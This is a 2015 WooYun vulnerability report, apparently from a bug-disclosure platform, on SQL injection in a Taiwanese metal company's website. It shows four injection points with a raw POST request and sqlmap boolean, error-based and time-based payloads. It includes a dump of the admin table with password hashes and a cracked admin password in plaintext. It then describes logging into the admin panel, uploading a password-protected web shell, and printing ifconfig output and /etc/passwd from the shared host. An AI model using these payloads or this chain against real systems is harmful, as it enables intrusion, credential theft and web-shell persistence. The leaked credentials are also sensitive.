当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161815

漏洞标题:友誌金屬股份有限公司sql注入(4处打包+管理员解密已入后台+已getshell可影响内网)(臺灣地區)

相关厂商:友誌金屬股份有限公司

漏洞作者: 路人甲

提交时间:2015-12-16 15:10

修复时间:2016-02-01 19:48

公开时间:2016-02-01 19:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

友誌金屬股份有限公司sql注入(4处打包+管理员解密已入后台+已getshell可影响内网)

详细说明:

擦 一步留神 被人提交了一个,这个应该不重复吧?
我直接给你打包
===============================================
注入点1:
在首页内容搜索处有post注入
post包

POST /products.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/products.php
Cookie: PHPSESSID=8da82j1qq7oq4mlqcma9ssk4t6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Actions=&keyword=1%27&button4.x=32&button4.y=16


4D_@1LR%_BYL@RG{6OQ3EBB.png


注入点2:

http://**.**.**.**/products.php?cid=10


cid存在注入
数据:

Place: GET
Parameter: cid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=10' AND 5723=5723 AND 'ksot'='ksot
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cid=10' AND (SELECT 3326 FROM(SELECT COUNT(*),CONCAT(0x
SELECT (CASE WHEN (3326=3326) THEN 1 ELSE 0 END)),0x3a6e79623a,FLOOR
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BgvB'='B
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cid=10' AND SLEEP(5) AND 'bBYY'='bBYY
---
[14:13:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[14:13:43] [INFO] fetching current user
[14:13:43] [INFO] retrieved: yozu@%
current user:    'yozu@%'


注入点3:

http://**.**.**.**/products.php?page=&keyword=&cid=10&pid=408


pid存在注入

current user:    'yozu@%'


注入点4:
http://**.**.**.**/modules_page.php?class=1&num=3
class和num都存在注入

current user:    'yozu@%'


available databases [2]:
[*] information_schema
[*] yozu


Database: yozu
[12 tables]
+---------------------------------------+
| contacts                              |
| counter                               |
| items                                 |
| menu_item_1                           |
| menu_item_2                           |
| news                                  |
| news_category                         |
| product                               |
| product_category                      |
| quick_links                           |
| suites                                |
| sysuser                               |
+---------------------------------------+


系统管理员:

Table: sysuser
[2 entries]
+--------+-----------+-----------------+-------------+--------------------------
--------+
| status | sysUserId | sysUserIdNameCH | sysUserName | sysUserPass
        |
+--------+-----------+-----------------+-------------+--------------------------
--------+
| 1      | 1         | ????????????    | admin       | f6ef546ef96e7fe9217047b4c
d31703e |
| 1      | 11        | NULL            | yozu        | b0390b11f782dc73c3b92d624
ab821b1 |
+--------+-----------+-----------------+-------------+--------------------------


去cmd5解密了
yozu
aol0xh08
后台登入地址:

http://**.**.**.**/admin/login.php


8NE~S5J%[WCW83%8K@@04P5.png


背景上传getshell
一句话:http://**.**.**.**/images/123dorr.php xiao

RTP4P@3N)HJQ`5UJ3E@UHGW.png


0[8~OWT~WTW6{8ST}PHJZQI.png


可影响内网:

[/var/www/vhosts/**.**.**.**/httpdocs/images/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:99:0B:1E  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::250:56ff:fe99:b1e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:289623235 errors:0 dropped:0 overruns:0 frame:0
          TX packets:355824926 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:42333090224 (39.4 GiB)  TX bytes:450134502913 (419.2 GiB)
eth0:0    Link encap:Ethernet  HWaddr 00:50:56:99:0B:1E  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:21919526 errors:0 dropped:0 overruns:0 frame:0
          TX packets:21919526 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:31139837549 (29.0 GiB)  TX bytes:31139837549 (29.0 GiB)


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sw-cp-server:x:500:500::/:/bin/true
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
psaadm:x:501:501:psa user:/usr/local/psa/admin:/sbin/nologin
popuser:x:110:31:POP3 service user:/var/qmail/popuser:/sbin/nologin
mhandlers-user:x:30:31:mail handlers user:/:/sbin/nologin
psaftp:x:502:503:anonftp psa user:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
steve:x:10075:10075::/home/steve:/bin/bash
clamav:x:498:499:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
horde_sysuser:x:497:10076:horde webmail user:/usr/share/psa-horde:/sbin/nologin
artbicycle:x:10076:505::/var/www/vhosts/**.**.**.**:/bin/false
beikin:x:10077:505::/var/www/vhosts/**.**.**.**:/bin/false
biotop:x:10078:505::/var/www/vhosts/**.**.**.**:/bin/false
bossdo:x:10079:505::/var/www/vhosts/**.**.**.**:/bin/false
cf-faucet:x:10080:505::/var/www/vhosts/**.**.**.**:/bin/false
changmei:x:10081:505::/var/www/vhosts/**.**.**.**:/bin/false
chdcc:x:10082:505::/var/www/vhosts/**.**.**.**:/bin/false
chelchem:x:10083:505::/var/www/vhosts/**.**.**.**:/bin/false
chen-hao:x:10084:505::/var/www/vhosts/**.**.**.**:/bin/false
cheng-kai:x:10085:505::/var/www/vhosts/**.**.**.**:/bin/false
chichia_online:x:10086:505::/var/www/vhosts/**.**.**.**:/bin/false
chinan:x:10087:505::/var/www/vhosts/**.**.**.**:/bin/false
chinghair:x:10088:505::/var/www/vhosts/**.**.**.**:/bin/false
chunli:x:10089:505::/var/www/vhosts/**.**.**.**:/bin/false
cs-plywood:x:10090:505::/var/www/vhosts/**.**.**.**:/bin/false
csic-tw:x:10091:505::/var/www/vhosts/**.**.**.**:/bin/false
dsrotocasting:x:10093:505::/var/www/vhosts/**.**.**.**:/bin/false
ertc:x:10094:505::/var/www/vhosts/**.**.**.**:/bin/false
esch:x:10095:505::/var/www/vhosts/**.**.**.**:/bin/false
dysample:x:10096:505::/var/www/vhosts/**.**.**.**:/bin/false
demo:x:10096:505::/var/www/vhosts/**.**.**.**/subdomains/demo:/bin/false
falali:x:10097:505::/var/www/vhosts/**.**.**.**:/bin/false
famego:x:10098:505::/var/www/vhosts/**.**.**.**:/bin/false
fastace:x:10099:505::/var/www/vhosts/**.**.**.**:/bin/false
fugeng:x:10100:505::/var/www/vhosts/**.**.**.**:/bin/false
gacity-tw:x:10101:505::/var/www/vhosts/**.**.**.**:/bin/false
gddg-china:x:10102:505::/var/www/vhosts/**.**.**.**:/bin/false
guggenheim:x:10103:505::/var/www/vhosts/**.**.**.**:/bin/false
heryei:x:10104:505::/var/www/vhosts/**.**.**.**:/bin/false
hexatool:x:10105:505::/var/www/vhosts/**.**.**.**:/bin/false
homing:x:10106:505::/var/www/vhosts/**.**.**.**:/bin/false
honiton:x:10107:505::/var/www/vhosts/**.**.**.**:/bin/false
hornse:x:10108:505::/var/www/vhosts/**.**.**.**:/bin/false
hunkun:x:10109:505::/var/www/vhosts/**.**.**.**:/bin/false
hwayi-foods:x:10110:505::/var/www/vhosts/**.**.**.**:/bin/false
ih-tools:x:10111:505::/var/www/vhosts/**.**.**.**:/bin/false
j-yang:x:10112:505::/var/www/vhosts/**.**.**.**:/bin/false
jeasheng:x:10113:505::/var/www/vhosts/**.**.**.**:/bin/false
jeoulian:x:10114:505::/var/www/vhosts/**.**.**.**:/bin/false
jhn:x:10115:505::/var/www/vhosts/**.**.**.**:/bin/false
jia-zhen:x:10116:505::/var/www/vhosts/**.**.**.**:/bin/false
jincian:x:10117:505::/var/www/vhosts/**.**.**.**:/bin/false
js-glass:x:10118:505::/var/www/vhosts/**.**.**.**:/bin/false
keyo:x:10119:505::/var/www/vhosts/**.**.**.**:/bin/false
kuen-fuh:x:10120:505::/var/www/vhosts/**.**.**.**:/bin/false
linnfa:x:10121:505::/var/www/vhosts/**.**.**.**:/bin/false
administrator:x:10122:505::/var/www/vhosts/localhost.localdomain:/bin/false
loyu:x:10123:505::/var/www/vhosts/**.**.**.**:/bin/false
manice:x:10124:505::/var/www/vhosts/**.**.**.**:/bin/false
mitsusuzu:x:10125:505::/var/www/vhosts/**.**.**.**:/bin/false
probar:x:10126:505::/var/www/vhosts/**.**.**.**:/bin/false
rollerking:x:10127:505::/var/www/vhosts/**.**.**.**:/bin/false
sdrock:x:10128:505::/var/www/vhosts/**.**.**.**:/bin/false
sensewin:x:10129:505::/var/www/vhosts/**.**.**.**:/bin/false
**.**.**.**:x:10130:505::/var/www/vhosts/**.**.**.**:/bin/false
sharpgun:x:10131:505::/var/www/vhosts/**.**.**.**.tw:/bin/false
sk-ht:x:10132:505::/var/www/vhosts/**.**.**.**:/bin/false
softjaws:x:10133:505::/var/www/vhosts/**.**.**.**:/bin/false
stork:x:10134:505::/var/www/vhosts/**.**.**.**:/bin/false
stu:x:10135:505::/var/www/vhosts/**.**.**.**:/bin/false
sunhang:x:10136:505::/var/www/vhosts/**.**.**.**:/bin/false
wys:x:10137:505::/var/www/vhosts/**.**.**.**:/bin/false
tanjun:x:10138:505::/var/www/vhosts/**.**.**.**:/bin/false
tdf:x:10139:505::/var/www/vhosts/**.**.**.**:/bin/false
tolian:x:10140:505::/var/www/vhosts/**.**.**.**:/bin/false
tripod:x:10141:505::/var/www/vhosts/**.**.**.**:/bin/false
tumak2:x:10142:505::/var/www/vhosts/**.**.**.**:/bin/false
tyalco:x:10143:505::/var/www/vhosts/**.**.**.**:/bin/false
use168:x:10144:505::/var/www/vhosts/**.**.**.**:/bin/false
veneer-art:x:10145:505::/var/www/vhosts/**.**.**.**:/bin/false
weimin_online:x:10146:505::/var/www/vhosts/**.**.**.**:/bin/false
winart:x:10147:505::/var/www/vhosts/**.**.**.**:/bin/false
xinhe:x:10148:505::/var/www/vhosts/**.**.**.**:/bin/false
yealeng:x:10149:505::/var/www/vhosts/**.**.**.**:/bin/false
yee-mingying:x:10150:505::/var/www/vhosts/**.**.**.**:/bin/false
yozu:x:10151:505::/var/www/vhosts/**.**.**.**:/bin/false
yu-hung:x:10152:505::/var/www/vhosts/**.**.**.**:/bin/false
vital:x:10153:505::/var/www/vhosts/**.**.**.**:/bin/false
freedoor:x:10154:505::/var/www/vhosts/**.**.**.**:/bin/false
honorpump:x:10155:505::/var/www/vhosts/**.**.**.**:/bin/false
sunny:x:10156:505::/var/www/vhosts/**.**.**.**:/bin/false
chen-fong:x:10157:505::/var/www/vhosts/**.**.**.**:/bin/false
lepack:x:10158:505::/var/www/vhosts/**.**.**.**:/bin/false
stspipe:x:10159:505::/var/www/vhosts/**.**.**.**:/bin/false
h5:x:10160:10160::/home/h5:/bin/bash
yi-lun:x:10161:505::/var/www/vhosts/**.**.**.**:/bin/false
versen:x:10162:505::/var/www/vhosts/**.**.**.**:/bin/false
jan-sheng:x:10163:505::/var/www/vhosts/**.**.**.**:/bin/false
yeong-luh:x:10164:505::/var/www/vhosts/**.**.**.**:/bin/false
jinyouli:x:10165:505::/var/www/vhosts/**.**.**.**:/bin/false
meng-nung:x:10166:505::/var/www/vhosts/**.**.**.**:/bin/false


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-18 19:49

厂商回复:

感謝通報

最新状态:

暂无